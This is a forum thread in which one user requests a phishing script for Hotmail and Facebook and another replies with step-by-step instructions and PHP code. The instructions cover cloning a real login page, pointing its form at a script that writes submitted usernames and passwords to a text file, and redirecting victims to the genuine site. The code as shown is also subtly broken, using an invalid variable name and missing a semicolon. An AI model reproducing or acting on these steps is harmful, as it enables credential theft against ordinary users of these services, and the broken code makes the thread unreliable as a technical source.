Login Register




The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


I need facebook and hotmail script filter_list
Author
Message
I need facebook and hotmail script #1
hi everyone. i need the phising script for hotmail and facebook . please pm me if you have it .

Reply

RE: I need facebook and hotmail script #2
What about google? You're welcome.

Reply

RE: I need facebook and hotmail script #3
It's simple as shit actually. Example:
Code:
<?php foreach ($_POST as $param_name => $param_val) { echo "$param_name: $param_val<br/>"; } ?> <form action="#" method="POST"> <input type="text" name="username" placeholder="username"/><br/> <input type="password" name="password" placeholder="password"/><br/> <input type="submit" value="Log in"/> </form>

1. CTRL+S and save the login page of facebook or whatever
2. Open it with notepad and CTRL+F search for "<form" and replace action with save.php
3. Save the login page and exit notepad, make a new file called save.php and put this in it:
Code:
<?php $input = file_get_contents("accounts.txt"); $2bstored .= "[" . date("F j, Y, g:i a") . "]\n"; foreach ($_POST as $param_name => $param_val) { $2bstored .= "$param_name: $param_val\n"; } $2bstored .= "\n\n" file_put_contents("accounts.txt", $input . $2bstored); ?>
There you have a simple phising script. You should add a redirect to the real webpage after the account has been stored though.

Reply